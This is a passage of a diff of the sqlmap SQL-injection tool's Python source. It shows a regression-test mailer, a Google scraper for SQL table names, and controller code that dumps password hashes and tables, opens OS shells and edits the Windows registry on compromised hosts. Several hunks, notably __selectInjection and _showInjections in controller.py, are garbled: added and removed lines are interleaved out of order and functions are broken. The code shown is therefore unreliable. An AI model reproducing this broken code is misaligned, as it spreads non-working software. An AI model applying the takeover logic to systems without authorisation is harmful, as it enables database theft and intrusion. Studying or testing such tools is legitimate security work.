    global TO
    global SUBJECT
    msg = MIMEMultipart()
    msg["Subject"] = SUBJECT
    msg["From"] = FROM
    msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO)
    msg.attach(MIMEText(content))
    return msg
 def send_email(msg):
    global SMTP_SERVER
    global SMTP_PORT
    global SMTP_TIMEOUT
    try:
        s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT)
        s.sendmail(FROM, TO, msg.as_string())
        s.quit()
    # Catch all for SMTP exceptions
    except smtplib.SMTPException, e:
        print "Failure to send email: %s" % str(e)
 def failure_email(msg):
    msg = prepare_email(msg)
    send_email(msg)
    sys.exit(1)
 def main():
    global SUBJECT
    content = ""
    test_counts = []
    attachments = {}
    updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = updateproc.communicate()
    if stderr:
        failure_email("Update of sqlmap failed with error:\n\n%s" % stderr)
    regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False)
    stdout, stderr = regressionproc.communicate()
    if stderr:
        failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
    failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
    for failed_test in failed_tests:
        title = failed_test[0]
        test_count = int(failed_test[1])
        parse = failed_test[3] if failed_test[3] else None
        output_folder = failed_test[4]
        traceback = False if failed_test[5] == "False" else bool(failed_test[5])
        detected = False if failed_test[6] else True
        test_counts.append(test_count)
        console_output_file = os.path.join(output_folder, "console_output")
        log_file = os.path.join(output_folder, TARGET, "log")
        traceback_file = os.path.join(output_folder, "traceback")
        if os.path.exists(console_output_file):
            console_output_fd = codecs.open(console_output_file, "rb", "utf8")
            console_output = console_output_fd.read()
            console_output_fd.close()
            attachments[test_count] = str(console_output)
        if os.path.exists(log_file):
            log_fd = codecs.open(log_file, "rb", "utf8")
            log = log_fd.read()
            log_fd.close()
        if os.path.exists(traceback_file):
            traceback_fd = codecs.open(traceback_file, "rb", "utf8")
            traceback = traceback_fd.read()
            traceback_fd.close()
        content += "Failed test case '%s' (#%d)" % (title, test_count)
        if parse:
            content += " at parsing: %s:\n\n" % parse
            content += "### Log file:\n\n"
            content += "%s\n\n" % log
        elif not detected:
            content += " - SQL injection not detected\n\n"
        else:
            content += "\n\n"
        if traceback:
            content += "### Traceback:\n\n"
            content += "%s\n\n" % str(traceback)
        content += "#######################################################################\n\n"
    end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
    if content:
        content += end_string
        SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts))
        msg = prepare_email(content)
        for test_count, attachment in attachments.items():
            attachment = MIMEText(attachment)
            attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count)
            msg.attach(attachment)
        send_email(msg)
    else:
        SUBJECT = "Successful %s" % SUBJECT
        msg = prepare_email("All test cases were successful\n\n%s" % end_string)
        send_email(msg)
 if __name__ == "__main__":
    log_fd = open("/tmp/sqlmapregressiontest.log", "wb")
    log_fd.write("Regression test started at %s\n" % START_TIME)
    try:
        main()
    except Exception, e:
        log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc()))
    log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()))
    log_fd.close()
--- a/extra/sqlharvest/init.py
+++ b/extra/sqlharvest/init.py
@@ -0,0 +1,8 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 pass
--- a/extra/sqlharvest/sqlharvest.py
+++ b/extra/sqlharvest/sqlharvest.py
@@ -0,0 +1,141 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import cookielib
 import re
 import socket
 import sys
 import urllib
 import urllib2
 import ConfigParser
 from operator import itemgetter
 TIMEOUT = 10
 CONFIG_FILE = 'sqlharvest.cfg'
 TABLES_FILE = 'tables.txt'
 USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)'
 SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic'
 MAX_FILE_SIZE = 2 * 1024 * 1024  # if a result (.sql) file for downloading is more than 2MB in size just skip it
 QUERY = 'CREATE TABLE ext:sql'
 REGEX_URLS = r';u=([^"]+?)&amp;q='
 REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)'
 def main():
    tables = dict()
    cookies = cookielib.CookieJar()
    cookie_processor = urllib2.HTTPCookieProcessor(cookies)
    opener = urllib2.build_opener(cookie_processor)
    opener.addheaders = [("User-Agent", USER_AGENT)]
    conn = opener.open(SEARCH_URL)
    page = conn.read()  # set initial cookie values
    config = ConfigParser.ConfigParser()
    config.read(CONFIG_FILE)
    if not config.has_section("options"):
        config.add_section("options")
    if not config.has_option("options", "index"):
        config.set("options", "index", "0")
    i = int(config.get("options", "index"))
    try:
        with open(TABLES_FILE, 'r') as f:
            for line in f.xreadlines():
                if len(line) > 0 and ',' in line:
                    temp = line.split(',')
                    tables[temp[0]] = int(temp[1])
    except:
        pass
    socket.setdefaulttimeout(TIMEOUT)
    files, old_files = None, None
    try:
        while True:
            abort = False
            old_files = files
            files = []
            try:
                conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10))
                page = conn.read()
                for match in re.finditer(REGEX_URLS, page):
                    files.append(urllib.unquote(match.group(1)))
                    if len(files) >= 10:
                        break
                abort = (files == old_files)
            except KeyboardInterrupt:
                raise
            except Exception, msg:
                print msg
            if abort:
                break
            sys.stdout.write("\n---------------\n")
            sys.stdout.write("Result page #%d\n" % (i + 1))
            sys.stdout.write("---------------\n")
            for sqlfile in files:
                print sqlfile
                try:
                    req = urllib2.Request(sqlfile)
                    response = urllib2.urlopen(req)
                    if "Content-Length" in response.headers:
                        if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE:
                            continue
                    page = response.read()
                    found = False
                    counter = 0
                    for match in re.finditer(REGEX_RESULT, page):
                        counter += 1
                        table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]')
                        if table and not any(_ in table for _ in ('>', '<', '--', ' ')):
                            found = True
                            sys.stdout.write('*')
                            if table in tables:
                                tables[table] += 1
                            else:
                                tables[table] = 1
                    if found:
                        sys.stdout.write("\n")
                except KeyboardInterrupt:
                    raise
                except Exception, msg:
                    print msg
            else:
                i += 1
    except KeyboardInterrupt:
        pass
    finally:
        with open(TABLES_FILE, 'w+') as f:
            tables = sorted(tables.items(), key=itemgetter(1), reverse=True)
            for table, count in tables:
                f.write("%s,%d\n" % (table, count))
        config.set("options", "index", str(i + 1))
        with open(CONFIG_FILE, 'w+') as f:
            config.write(f)
 if __name__ == "__main__":
    main()
--- a/lib/init.py
+++ b/lib/init.py
@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 pass
--- a/lib/contrib/init.py
+++ b/lib/contrib/init.py
@@ -1,25 +0,0 @@
 #!/usr/bin/env python
 """
 $Id$
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 pass
--- a/lib/controller/init.py
+++ b/lib/controller/init.py
@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 pass
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -1,55 +1,38 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 from lib.controller.handler import setHandler
-from lib.core.common import getHtmlErrorFp
+from lib.core.common import Backend
 from lib.core.common import Format
 from lib.core.data import conf
 from lib.core.data import kb
-from lib.core.dump import dumper
+from lib.core.data import logger
-from lib.core.exception import sqlmapUnsupportedDBMSException
+from lib.core.data import paths
 from lib.core.enums import CONTENT_TYPE
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapUnsupportedDBMSException
 from lib.core.settings import SUPPORTED_DBMS
-from lib.techniques.blind.timebased import timeTest
+from lib.techniques.brute.use import columnExists
-from lib.techniques.inband.union.test import unionTest
+from lib.techniques.brute.use import tableExists
 from lib.techniques.outband.stacked import stackedTest
 def action():
    """
    This function exploit the SQL injection on the affected
-    url parameter and extract requested data from the
+    URL parameter and extract requested data from the
    back-end database management system or operating system
    if possible
    """
    # First of all we have to identify the back-end database management
    # system to be able to go ahead with the injection
-    conf.dbmsHandler = setHandler()
+    setHandler()
-    if not conf.dbmsHandler:
+    if not Backend.getDbms() or not conf.dbmsHandler:
-        htmlParsed = getHtmlErrorFp()
+        htmlParsed = Format.getErrorParsedDBMSes()
        errMsg = "sqlmap was not able to fingerprint the "
        errMsg += "back-end database management system"
@@ -62,76 +45,142 @@ def action():
        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
            errMsg += ". Do not specify the back-end DBMS manually, "
            errMsg += "sqlmap will fingerprint the DBMS for you"
        elif kb.nullConnection:
            errMsg += ". You can try to rerun without using optimization "
            errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
        else:
-            errMsg += ". Support for this DBMS will be implemented if "
+            errMsg += ". Support for this DBMS will be implemented at "
-            errMsg += "you ask, just drop us an email"
+            errMsg += "some point"
-        raise sqlmapUnsupportedDBMSException, errMsg
+        raise SqlmapUnsupportedDBMSException(errMsg)
-    print "%s\n" % conf.dbmsHandler.getFingerprint()
+    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())
    # Techniques options
    if conf.stackedTest:
        dumper.string("stacked queries support", stackedTest())
    if conf.timeTest:
        dumper.string("time based blind sql injection payload", timeTest())
    if conf.unionTest:
        dumper.string("valid union", unionTest())
    # Enumeration options
    if conf.getBanner:
-        dumper.string("banner", conf.dbmsHandler.getBanner())
+        conf.dumper.banner(conf.dbmsHandler.getBanner())
    if conf.getCurrentUser:
-        dumper.string("current user", conf.dbmsHandler.getCurrentUser())
+        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
    if conf.getCurrentDb:
-        dumper.string("current database", conf.dbmsHandler.getCurrentDb())
+        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
    if conf.getHostname:
        conf.dumper.hostname(conf.dbmsHandler.getHostname())
    if conf.isDba:
-        dumper.string("current user is DBA", conf.dbmsHandler.isDba())
+        conf.dumper.dba(conf.dbmsHandler.isDba())
    if conf.getUsers:
-        dumper.lister("database management system users", conf.dbmsHandler.getUsers())
+        conf.dumper.users(conf.dbmsHandler.getUsers())
    if conf.getPasswordHashes:
-        dumper.userSettings("database management system users password hashes",
+        try:
-                            conf.dbmsHandler.getPasswordHashes(), "password hash")
+            conf.dumper.userSettings("database management system users password hashes",
                                    conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
            raise
    if conf.getPrivileges:
-        dumper.userSettings("database management system users privileges",
+        try:
-                            conf.dbmsHandler.getPrivileges(), "privilege")
+            conf.dumper.userSettings("database management system users privileges",
                                    conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
            raise
    if conf.getRoles:
        try:
            conf.dumper.userSettings("database management system users roles",
                                    conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
        except SqlmapNoneDataException, ex:
            logger.critical(ex)
        except:
            raise
    if conf.getDbs:
-        dumper.lister("available databases", conf.dbmsHandler.getDbs())
+        conf.dumper.dbs(conf.dbmsHandler.getDbs())
    if conf.getTables:
-        dumper.dbTables(conf.dbmsHandler.getTables())
+        conf.dumper.dbTables(conf.dbmsHandler.getTables())
    if conf.commonTables:
        conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))
    if conf.getSchema:
        conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)
    if conf.getColumns:
-        dumper.dbTableColumns(conf.dbmsHandler.getColumns())
+        conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)
    if conf.getCount:
        conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())
    if conf.commonColumns:
        conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))
    if conf.dumpTable:
-        dumper.dbTableValues(conf.dbmsHandler.dumpTable())
+        conf.dbmsHandler.dumpTable()
    if conf.dumpAll:
        conf.dbmsHandler.dumpAll()
    if conf.search:
        conf.dbmsHandler.search()
    if conf.query:
-        dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
+        conf.dumper.query(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
    if conf.sqlShell:
        conf.dbmsHandler.sqlShell()
    if conf.sqlFile:
        conf.dbmsHandler.sqlFile()
    # User-defined function options
    if conf.udfInject:
        conf.dbmsHandler.udfInjectCustom()
    # File system options
    if conf.rFile:
-        dumper.string(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
+        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))
    if conf.wFile:
-        dumper.string(conf.wFile, conf.dbmsHandler.writeFile(conf.wFile))
+        conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
    # Operating system options
    if conf.osCmd:
        conf.dbmsHandler.osCmd()
    # Takeover options
    if conf.osShell:
        conf.dbmsHandler.osShell()
    if conf.osPwn:
        conf.dbmsHandler.osPwn()
    if conf.osSmb:
        conf.dbmsHandler.osSmb()
    if conf.osBof:
        conf.dbmsHandler.osBof()
    # Windows registry options
    if conf.regRead:
        conf.dumper.registerValue(conf.dbmsHandler.regRead())
    if conf.regAdd:
        conf.dbmsHandler.regAdd()
    if conf.regDel:
        conf.dbmsHandler.regDel()
    # Miscellaneous options
    if conf.cleanup:
        conf.dbmsHandler.cleanup()
    if conf.direct:
        conf.dbmsConnector.close()
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -1,28 +1,12 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-
+import os
 import re
 from lib.controller.action import action
 from lib.controller.checks import checkSqlInjection
@@ -31,59 +15,235 @@ from lib.controller.checks import checkStability
 from lib.controller.checks import checkString
 from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkConnection
-from lib.core.common import paramToDict
+from lib.controller.checks import checkNullConnection
 from lib.controller.checks import checkWaf
 from lib.controller.checks import heuristicCheckSqlInjection
 from lib.controller.checks import identifyWaf
 from lib.core.agent import agent
 from lib.core.common import dataToStdout
 from lib.core.common import extractRegexResult
 from lib.core.common import getFilteredPageContent
 from lib.core.common import getPublicTypeMembers
 from lib.core.common import getSafeExString
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import intersect
 from lib.core.common import isListLike
 from lib.core.common import parseTargetUrl
 from lib.core.common import popValue
 from lib.core.common import pushValue
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import safeCSValue
 from lib.core.common import showHttpErrorCodes
 from lib.core.common import urlencode
 from lib.core.common import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
-from lib.core.exception import sqlmapConnectionException
+from lib.core.enums import CONTENT_TYPE
-from lib.core.exception import sqlmapNotVulnerableException
+from lib.core.enums import HASHDB_KEYS
-from lib.core.session import setInjection
+from lib.core.enums import HEURISTIC_TEST
-from lib.core.target import createTargetDirs
+from lib.core.enums import HTTPMETHOD
 from lib.core.enums import NOTE
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
 from lib.core.exception import SqlmapBaseException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapNotVulnerableException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapValueException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import ASP_NET_CONTROL_REGEX
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
 from lib.core.settings import IGNORE_PARAMETERS
 from lib.core.settings import LOW_TEXT_PERCENT
 from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
 from lib.core.settings import HOST_ALIASES
 from lib.core.settings import REFERER_ALIASES
 from lib.core.settings import USER_AGENT_ALIASES
 from lib.core.target import initTargetEnv
-from lib.utils.parenthesis import checkForParenthesis
+from lib.core.target import setupTargetEnv
 from thirdparty.pagerank.pagerank import get_pagerank
-
+def _selectInjection():
 def __selectInjection(injData):
    """
    Selection function for injection place, parameters and type.
    """
-    message  = "there were multiple injection points, please select the "
+    points = {}
    message += "one to use to go ahead:\n"
-    for i in xrange(0, len(injData)):
+    for injection in kb.injections:
-        injPlace     = injData[i][0]
+        place = injection.place
-        injParameter = injData[i][1]
+        parameter = injection.parameter
-        injType      = injData[i][2]
+        ptype = injection.ptype
-        message += "[%d] place: %s, parameter: " % (i, injPlace)
+        point = (place, parameter, ptype)
-        message += "%s, type: %s" % (injParameter, injType)
+
        if point not in points:
            points[point] = injection
        else:
            for key in points[point].keys():
                if key != 'data':
                    points[point][key] = points[point][key] or injection[key]
            points[point]['data'].update(injection['data'])
    if len(points) == 1:
        kb.injection = kb.injections[0]
    elif len(points) > 1:
        message = "there were multiple injection points, please select "
        message += "the one to use for following injections:\n"
        points = []
        for i in xrange(0, len(kb.injections)):
            place = kb.injections[i].place
            parameter = kb.injections[i].parameter
            ptype = kb.injections[i].ptype
            point = (place, parameter, ptype)
            if point not in points:
                points.append(point)
                ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype
                message += "[%d] place: %s, parameter: " % (i, place)
                message += "%s, type: %s" % (parameter, ptype)
                if i == 0:
                    message += " (default)"
                message += "\n"
-    message += "[q] Quit\nChoice: "
+        message += "[q] Quit"
        select = readInput(message, default="0")
-    if not select:
+        if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0:
        index = 0
    elif select.isdigit() and int(select) < len(injData) and int(select) >= 0:
            index = int(select)
-
+        elif select[0] in ("Q", "q"):
-    elif select[0] in ( "Q", "q" ):
+            raise SqlmapUserQuitException
        return "Quit"
        else:
-        warnMsg = "Invalid choice, retry"
+            errMsg = "invalid choice"
            raise SqlmapValueException(errMsg)
        kb.injection = kb.injections[index]
 def _formatInjection(inj):
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
    data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
    for stype, sdata in inj.data.items():
        title = sdata.title
        vector = sdata.vector
        comment = sdata.comment
        payload = agent.adjustLateValues(sdata.payload)
        if inj.place == PLACE.CUSTOM_HEADER:
            payload = payload.split(',', 1)[1]
        if stype == PAYLOAD.TECHNIQUE.UNION:
            count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
            title = re.sub(r"\d+ to \d+", str(count), title)
            vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
            if count == 1:
                title = title.replace("columns", "column")
        elif comment:
            vector = "%s%s" % (vector, comment)
        data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
        data += "    Title: %s\n" % title
        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
        data += "    Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
    return data
 def _showInjections():
    if kb.testQueryCount > 0:
        header = "sqlmap identified the following injection point(s) with "
        header += "a total of %d HTTP(s) requests" % kb.testQueryCount
    else:
        header = "sqlmap resumed the following injection point(s) from stored session"
    if hasattr(conf, "api"):
        conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
    else:
        data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n")
        conf.dumper.string(header, data)
    if conf.tamper:
        warnMsg = "changes made by tampering scripts are not "
        warnMsg += "included in shown payload content(s)"
        logger.warn(warnMsg)
        __selectInjection(injData)
-    return injData[index]
+    if conf.hpp:
        warnMsg = "changes made by HTTP parameter pollution are not "
        warnMsg += "included in shown payload content(s)"
        logger.warn(warnMsg)
 def _randomFillBlankFields(value):
    retVal = value
    if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value):
        message = "do you want to fill blank fields with random values? [Y/n] "
        test = readInput(message, default="Y")
        if not test or test[0] in ("y", "Y"):
            for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal):
                item = match.group("result")
                if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item):
                    if item[-1] == DEFAULT_GET_POST_DELIMITER:
                        retVal = retVal.replace(item, "%s%s%s" % (item[:-1], randomStr(), DEFAULT_GET_POST_DELIMITER))
                    else:
                        retVal = retVal.replace(item, "%s%s" % (item, randomStr()))
    return retVal
 def _saveToHashDB():
    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
    if not isListLike(injections):
        injections = []
    injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
    _ = dict()
    for injection in injections:
        key = (injection.place, injection.parameter, injection.ptype)
        if key not in _:
            _[key] = injection
        else:
            _[key].data.update(injection.data)
    hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True)
    _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
    hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)
    if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
        hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)
    if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS):
        hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True)
 def _saveToResultsFile():
    if not conf.resultsFP:
        return
    results = {}
    techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE)))
    for injection in kb.injections + kb.falsePositives:
        if injection.place is None or injection.parameter is None:
            continue
        key = (injection.place, injection.parameter, ';'.join(injection.notes))
        if key not in results:
            results[key] = []
        results[key].extend(injection.data.keys())
    for key, value in results.items():
        place, parameter, notes = key
        line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), notes, os.linesep)
        conf.resultsFP.writelines(line)
    if not results:
        line = "%s,,,,%s" % (conf.url, os.linesep)
        conf.resultsFP.writelines(line)
 def start():
    """
@@ -92,176 +252,437 @@ def start():
    check if they are dynamic and SQL injection affected
    """
-    if conf.url:
+    if conf.direct:
-        kb.targetUrls.add(( conf.url, conf.method, conf.data, conf.cookie ))
+        initTargetEnv()
        setupTargetEnv()
        action()
        return True
-    if conf.configFile and not kb.targetUrls:
+    if conf.url and not any((conf.forms, conf.crawlDepth)):
        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
    if conf.configFile and not kb.targets:
        errMsg = "you did not edit the configuration file properly, set "
-        errMsg += "the target url, list of targets or google dork"
+        errMsg += "the target URL, list of targets or google dork"
        logger.error(errMsg)
        return False
-    if kb.targetUrls and len(kb.targetUrls) > 1:
+    if kb.targets and len(kb.targets) > 1:
-        infoMsg = "sqlmap got a total of %d targets" % len(kb.targetUrls)
+        infoMsg = "sqlmap got a total of %d targets" % len(kb.targets)
        logger.info(infoMsg)
    hostCount = 0
-    receivedCookies         = []
+    initialHeaders = list(conf.httpHeaders)
    cookieStr               = ""
    setCookieAsInjectable   = True
-    for targetUrl, targetMethod, targetData, targetCookie in kb.targetUrls:
+    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
        try:
            conf.url = targetUrl
-        conf.method = targetMethod
+            conf.method = targetMethod.upper() if targetMethod else targetMethod
            conf.data = targetData
            conf.cookie = targetCookie
-        injData     = []
+            conf.httpHeaders = list(initialHeaders)
            conf.httpHeaders.extend(targetHeaders or [])
            initTargetEnv()
            parseTargetUrl()
            testSqlInj = False
            if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]):
                for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
                    paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])
                    if paramKey not in kb.testedParams:
                        testSqlInj = True
                        break
            else:
                paramKey = (conf.hostname, conf.path, None, None)
                if paramKey not in kb.testedParams:
                    testSqlInj = True
            if testSqlInj and conf.hostname in kb.vulnHosts:
                if kb.skipVulnHost is None:
                    message = "SQL injection vulnerability has already been detected "
                    message += "against '%s'. Do you want to skip " % conf.hostname
                    message += "further tests involving it? [Y/n]"
                    kb.skipVulnHost = readInput(message, default="Y").upper() != 'N'
                testSqlInj = not kb.skipVulnHost
            if not testSqlInj:
                infoMsg = "skipping '%s'" % targetUrl
                logger.info(infoMsg)
                continue
            if conf.multipleTargets:
                hostCount += 1
-            message = "url %d:\n%s %s" % (hostCount, conf.method or "GET", targetUrl)
+
                if conf.forms and conf.method:
